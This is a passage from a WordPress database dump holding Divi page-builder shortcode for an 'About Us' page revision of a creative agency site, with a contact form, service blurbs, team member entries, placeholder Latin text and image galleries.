button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 18:48:17','2020-08-07 18:48:17','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(541,1,'2020-08-07 18:50:18','2020-08-07 18:50:18','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\" parallax=\"on\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"dhiraj kumar founder \" title_text=\"dhiraj kumar whatthehell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"dhiraj kumar founder \" title_text=\"travel-portrait-06\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" 